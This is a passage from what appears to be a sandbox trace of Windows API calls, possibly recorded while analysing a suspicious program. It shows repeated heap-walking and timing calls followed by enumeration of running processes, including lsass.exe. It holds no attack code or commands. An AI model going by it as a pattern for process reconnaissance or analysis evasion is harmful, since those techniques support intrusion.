returned 1 [0167.517] Heap32Next (lphe=0x401efc0) returned 1 [0167.545] GetTickCount () returned 0x115933b [0167.545] GetCurrentThreadId () returned 0x324 [0167.545] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.545] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.545] Heap32Next (lphe=0x401efc0) returned 1 [0167.565] GetTickCount () returned 0x115935a [0167.565] GetCurrentThreadId () returned 0x324 [0167.565] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.565] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.565] Heap32Next (lphe=0x401efc0) returned 1 [0167.591] GetTickCount () returned 0x115936a [0167.591] GetCurrentThreadId () returned 0x324 [0167.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.591] Heap32Next (lphe=0x401efc0) returned 1 [0167.638] GetTickCount () returned 0x1159399 [0167.638] GetCurrentThreadId () returned 0x324 [0167.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.639] Heap32Next (lphe=0x401efc0) returned 1 [0167.668] GetTickCount () returned 0x11593b8 [0167.668] GetCurrentThreadId () returned 0x324 [0167.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.668] Heap32Next (lphe=0x401efc0) returned 1 [0167.696] GetTickCount () returned 0x11593d7 [0167.696] GetCurrentThreadId () returned 0x324 [0167.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.696] Heap32Next (lphe=0x401efc0) returned 1 [0167.723] GetTickCount () returned 0x11593f6 [0167.723] GetCurrentThreadId () returned 0x324 [0167.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.723] Heap32Next (lphe=0x401efc0) returned 1 [0167.748] GetTickCount () returned 0x1159406 [0167.748] GetCurrentThreadId () returned 0x324 [0167.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.748] Heap32Next (lphe=0x401efc0) returned 1 [0167.771] GetTickCount () returned 0x1159425 [0167.771] GetCurrentThreadId () returned 0x324 [0167.771] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.771] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.771] Heap32Next (lphe=0x401efc0) returned 1 [0167.796] GetTickCount () returned 0x1159435 [0167.796] GetCurrentThreadId () returned 0x324 [0167.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.796] Heap32Next (lphe=0x401efc0) returned 1 [0167.833] GetTickCount () returned 0x1159464 [0167.833] GetCurrentThreadId () returned 0x324 [0167.834] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.834] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.834] Heap32Next (lphe=0x401efc0) returned 1 [0167.861] GetTickCount () returned 0x1159483 [0167.861] GetCurrentThreadId () returned 0x324 [0167.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.861] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.862] Heap32Next (lphe=0x401efc0) returned 1 [0167.883] GetTickCount () returned 0x1159492 [0167.883] GetCurrentThreadId () returned 0x324 [0167.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.884] Heap32Next (lphe=0x401efc0) returned 1 [0167.905] GetTickCount () returned 0x11594a2 [0167.905] GetCurrentThreadId () returned 0x324 [0167.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.905] Heap32Next (lphe=0x401efc0) returned 1 [0167.927] GetTickCount () returned 0x11594c1 [0167.927] GetCurrentThreadId () returned 0x324 [0167.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.928] Heap32Next (lphe=0x401efc0) returned 1 [0167.948] GetTickCount () returned 0x11594d1 [0167.948] GetCurrentThreadId () returned 0x324 [0167.949] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.949] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.949] Heap32Next (lphe=0x401efc0) returned 1 [0167.988] GetTickCount () returned 0x1159500 [0167.988] GetCurrentThreadId () returned 0x324 [0167.988] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.988] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.988] Heap32Next (lphe=0x401efc0) returned 1 [0168.010] GetTickCount () returned 0x115950f [0168.010] GetCurrentThreadId () returned 0x324 [0168.010] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.010] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.010] Heap32Next (lphe=0x401efc0) returned 1 [0168.032] GetTickCount () returned 0x115952e [0168.032] GetCurrentThreadId () returned 0x324 [0168.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.033] Heap32Next (lphe=0x401efc0) returned 1 [0168.059] GetTickCount () returned 0x115953e [0168.060] GetCurrentThreadId () returned 0x324 [0168.060] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.060] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.060] Heap32Next (lphe=0x401efc0) returned 1 [0168.087] GetTickCount () returned 0x115955d [0168.087] GetCurrentThreadId () returned 0x324 [0168.087] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.087] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.087] Heap32Next (lphe=0x401efc0) returned 1 [0168.109] GetTickCount () returned 0x115957c [0168.109] GetCurrentThreadId () returned 0x324 [0168.110] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.110] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.110] Heap32Next (lphe=0x401efc0) returned 1 [0168.132] GetTickCount () returned 0x115958c [0168.132] GetCurrentThreadId () returned 0x324 [0168.132] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.133] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.133] Heap32Next (lphe=0x401efc0) returned 1 [0168.155] GetTickCount () returned 0x115959c [0168.155] GetCurrentThreadId () returned 0x324 [0168.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.155] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.155] Heap32Next (lphe=0x401efc0) returned 1 [0168.177] GetTickCount () returned 0x11595bb [0168.177] GetCurrentThreadId () returned 0x324 [0168.177] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.177] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.177] Heap32Next (lphe=0x401efc0) returned 1 [0168.201] GetTickCount () returned 0x11595ca [0168.202] GetCurrentThreadId () returned 0x324 [0168.202] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.202] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.202] Heap32Next (lphe=0x401efc0) returned 1 [0168.237] GetTickCount () returned 0x11595f9 [0168.237] GetCurrentThreadId () returned 0x324 [0168.237] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.237] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.237] Heap32Next (lphe=0x401efc0) returned 1 [0168.260] GetTickCount () returned 0x1159609 [0168.260] GetCurrentThreadId () returned 0x324 [0168.260] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.260] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.260] Heap32Next (lphe=0x401efc0) returned 1 [0168.285] GetTickCount () returned 0x1159628 [0168.285] GetCurrentThreadId () returned 0x324 [0168.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.285] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.285] Heap32Next (lphe=0x401efc0) returned 1 [0168.308] GetTickCount () returned 0x1159638 [0168.308] GetCurrentThreadId () returned 0x324 [0168.308] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.308] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.308] Heap32Next (lphe=0x401efc0) returned 1 [0168.333] GetTickCount () returned 0x1159657 [0168.333] GetCurrentThreadId () returned 0x324 [0168.333] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.333] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.333] Heap32Next (lphe=0x401efc0) returned 1 [0168.357] GetTickCount () returned 0x1159666 [0168.357] GetCurrentThreadId () returned 0x324 [0168.357] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.357] Heap32Next (lphe=0x401efc0) returned 1 [0168.380] GetTickCount () returned 0x1159686 [0168.380] GetCurrentThreadId () returned 0x324 [0168.380] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.380] Heap32Next (lphe=0x401efc0) returned 1 [0168.409] GetTickCount () returned 0x11596a5 [0168.409] Heap32ListNext (hSnapshot=0x674, lphl=0x401f454) returned 1 [0168.410] GetTickCount () returned 0x11596a5 [0168.410] GetTickCount () returned 0x11596a5 [0168.410] Process32First (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.412] GetCurrentThreadId () returned 0x324 [0168.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.412] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0168.414] GetTickCount () returned 0x11596a5 [0168.414] GetCurrentThreadId () returned 0x324 [0168.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.414] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.414] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0168.415] GetTickCount () returned 0x11596a5 [0168.415] GetCurrentThreadId () returned 0x324 [0168.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.415] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.415] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0168.416] GetTickCount () returned 0x11596a5 [0168.416] GetCurrentThreadId () returned 0x324 [0168.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.416] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0168.417] GetTickCount () returned 0x11596a5 [0168.417] GetCurrentThreadId () returned 0x324 [0168.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.417] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0168.418] GetTickCount () returned 0x11596a5 [0168.418] GetCurrentThreadId () returned 0x324 [0168.418] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.418] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.418] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0168.419] GetTickCount () returned 0x11596a5 [0168.419] GetCurrentThreadId () returned 0x324 [0168.419] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.419] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.419] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0168.420] GetTickCount () returned 0x11596a5 [0168.420] GetCurrentThreadId () returned 0x324 [0168.420] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.420] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.420] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0168.421] GetTickCount () returned 0x11596b4 [0168.421] GetCurrentThreadId () returned 0x324 [0168.421] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.421] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.421] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0168.422] GetTickCount () returned 0x11596b4 [0168.422] GetCurrentThreadId () returned 0x324 [0168.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.423] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.423] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.423] GetTickCount () returned 0x11596b4 [0168.423] GetCurrentThreadId () returned 0x324 [0168.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.424] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.424] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.424] GetTickCount () returned 0x11596b4 [0168.424] GetCurrentThreadId () returned 0x324 [0168.424] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.424] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.425] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.425] GetTickCount () returned 0x11596b4 [0168.425] GetCurrentThreadId () returned 0x324 [0168.425] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.425] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.426] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.426] GetTickCount () returned 0x11596b4 [0168.426] GetCurrentThreadId () returned 0x324 [0168.426] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.426] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.426] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.427] GetTickCount () returned 0x11596b4 [0168.427] GetCurrentThreadId () returned 0x324 [0168.427] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.427] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.428] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0168.428] GetTickCount () returned 0x11596b4 [0168.428] GetCurrentThreadId () returned 0x324 [0168.428] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.429] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.429] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.429] GetTickCount () returned 0x11596b4 [0168.430] GetCurrentThreadId () returned 0x324 [0168.430] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.430] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.430] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.430] GetTickCount () returned 0x11596b4 [0168.431] GetCurrentThreadId () returned 0x324 [0168.431] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.431] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.431] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0168.431] GetTickCount () returned 0x11596b4 [0168.431] GetCurrentThreadId () returned 0x324 [0168.432] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.432] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.432] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0168.432] GetTickCount () returned 0x11596b4 [0168.432] GetCurrentThreadId () returned 0x324 [0168.433] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.433] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.433] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0168.433] GetTickCount () returned 0x11596b4 [0168.433] GetCurrentThreadId () returned 0x324 [0168.433] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.433] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.434] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.434] GetTickCount () returned 0x11596b4 [0168.434] GetCurrentThreadId () returned 0x324 [0168.434] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.434] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.434] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0168.435] GetTickCount () returned 0x11596b4 [0168.435] GetCurrentThreadId () returned 0x324 [0168.435] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.435] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.435] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0168.437] GetTickCount () returned 0x11596c4 [0168.437] GetCurrentThreadId () returned 0x324 [0168.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.437] HeapFree (in: 